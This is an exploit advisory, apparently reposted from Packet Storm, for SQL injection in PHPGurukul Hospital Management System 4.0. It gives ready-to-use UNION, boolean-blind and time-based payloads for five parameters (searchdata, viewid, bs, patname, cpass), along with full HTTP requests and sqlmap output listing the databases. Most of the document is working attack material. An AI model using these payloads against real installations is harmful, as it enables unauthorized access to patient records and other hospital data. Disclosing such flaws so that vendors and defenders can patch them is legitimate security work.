Exploit for Hospital Management System 4.0 searchdata SQL Injection

Name: Exploit for Hospital Management System 4.0 searchdata SQL Injection
Rating: 5 (177 reviews)
2020-01-02 | CVSS 0.4
## https://sploitus.com/exploit?id=PACKETSTORM:155817
# Exploit Title: Hospital Management System 4.0 - 'searchdata' SQL Injection  
# Google Dork: N/A  
# Date: 2020-01-02  
# Exploit Author: FULLSHADE  
# Vendor Homepage: https://phpgurukul.com/  
# Software Link: https://phpgurukul.com/hospital-management-system-in-php/  
# Version: v4.0  
# Tested on: Windows  
# CVE : N/A  
  
# The Hospital Management System 4.0 web application is vulnerable to  
# SQL injection in multiple areas, listed below are 5 of the prominent  
# and easy to exploit areas.  
  
================================ 1 - SQLi ================================  
  
POST /hospital/hospital/hms/doctor/search.php HTTP/1.1  
Host: 10.0.0.214  
User-Agent: Mozilla/5.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 22  
Origin: https://10.0.0.214  
DNT: 1  
Connection: close  
Referer: https://10.0.0.214/hospital/hospital/hms/doctor/search.php  
Cookie: PHPSESSID=301tn3sqt3gmimkc9epe7kjha5  
Upgrade-Insecure-Requests: 1  
  
searchdata=&search=  
  
?searchdata parameter is vulnerable to SQL injection under the search feature in the doctor login.  
  
POST parameter 'searchdata' is vulnerable.  
sqlmap identified the following injection point(s) with a total of 120 HTTP(s) requests:  
---  
Parameter: searchdata (POST)  
Type: UNION query  
Title: Generic UNION query (NULL) - 11 columns  
Payload: searchdata=' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(CONCAT('qvxbq','zIuFTDXhtLrbZmAXQXxIalrRpZgCjsPnduKboFfW'),'qpqjq'),NULL-- PqeG&search=  
---  
[15:49:58] [INFO] testing MySQL  
[15:49:58] [INFO] confirming MySQL  
[15:49:58] [INFO] the back-end DBMS is MySQL  
web application technology: Apache 2.4.41, PHP 7.4.1  
back-end DBMS: MySQL >= 5.0.0 (MariaDB fork)  
[15:49:58] [INFO] fetching database names  
available databases [6]:  
[*] hms  
[*] information_schema  
[*] mysql  
[*] performance_schema  
[*] phpmyadmin  
[*] test  
  
================================ 2 - SQLi ================================  
  
GET parameter 'viewid' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n  
sqlmap identified the following injection point(s) with a total of 40 HTTP(s) requests:  
---  
Parameter: viewid (GET)  
Type: boolean-based blind  
Title: AND boolean-based blind - WHERE or HAVING clause  
Payload: viewid=6' AND 3413=3413 AND 'nBkv'='nBkv  
  
Type: time-based blind  
Title: MySQL >= 5.0.12 AND time-based blind  
Payload: viewid=6' AND SLEEP(5) AND 'PJim'='PJim  
  
Type: UNION query  
Title: Generic UNION query (NULL) - 11 columns  
Payload: viewid=6' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7162767071,0x7957464b6f4a78624b536a75497051715a71587353746a4b6e45716441646345614f725449555748,0x717a717a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- XNyp  
  
[15:54:21] [INFO] fetching database names  
available databases [6]:  
[*] hms  
[*] information_schema  
[*] mysql  
[*] performance_schema  
[*] phpmyadmin  
[*] test  
  
GET /hospital/hospital/hms/doctor/view-patient.php?viewid=6 HTTP/1.1  
Host: 10.0.0.214  
User-Agent: Mozilla/5.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
DNT: 1  
Connection: close  
Cookie: PHPSESSID=301tn3sqt3gmimkc9epe7kjha5  
Upgrade-Insecure-Requests: 1  
Cache-Control: max-age=0  
  
?viewid parameter is vulnerable to SQLi while viewing a patient under the doctor login  
  
================================ 3 - SQLi ================================  
  
Parameter: bs (POST)  
Type: time-based blind  
Title: MySQL >= 5.0.12 AND time-based blind  
Payload: bp=123&bs=123' AND SLEEP(5) AND 'CKbI'='CKbI&weight=123&temp=123&pres=123&submit=  
  
?bs parameter is vulnerable to SQL injection on the doctors login when adding medical history to a patient  
  
================================ 4 - SQLi ================================  
  
POST /hospital/hospital/hms/doctor/add-patient.php HTTP/1.1  
Host: 10.0.0.214  
User-Agent: Mozilla/5.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Referer: https://10.0.0.214/hospital/hospital/hms/doctor/add-patient.php  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 111  
Origin: https://10.0.0.214  
DNT: 1  
Connection: close  
Cookie: PHPSESSID=301tn3sqt3gmimkc9epe7kjha5  
Upgrade-Insecure-Requests: 1  
  
patname=  
  
patname parameter is vulnerable to SQLi under the add patient in the doctor login  
  
================================ 5 - SQLi ================================  
  
---  
Parameter: cpass (POST)  
Type: boolean-based blind  
Title: AND boolean-based blind - WHERE or HAVING clause (MySQL comment)  
Payload: cpass=123' AND 4808=4808#&npass=123&cfpass=123&submit=123  
  
Type: time-based blind  
Title: MySQL >= 5.0.12 AND time-based blind  
Payload: cpass=123' AND SLEEP(5)-- taxP&npass=123&cfpass=123&submit=123  
---  
available databases [6]:  
[*] hms  
[*] information_schema  
[*] mysql  
[*] performance_schema  
[*] phpmyadmin  
[*] test  
  
POST /hospital/hospital/hms/admin/change-password.php HTTP/1.1  
Host: 10.0.0.214  
User-Agent: Mozilla/5.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 38  
Origin: http://10.0.0.214  
DNT: 1  
Connection: close  
Referer: http://10.0.0.214/hospital/hospital/hms/admin/change-password.php  
Cookie: PHPSESSID=g1mpom762nglpeptn51b4rg5h5  
Upgrade-Insecure-Requests: 1  
  
cpass=123&npass=123&cfpass=123&submit=123  
  
the ?cpass parameter is vulnerable to blind SQL injection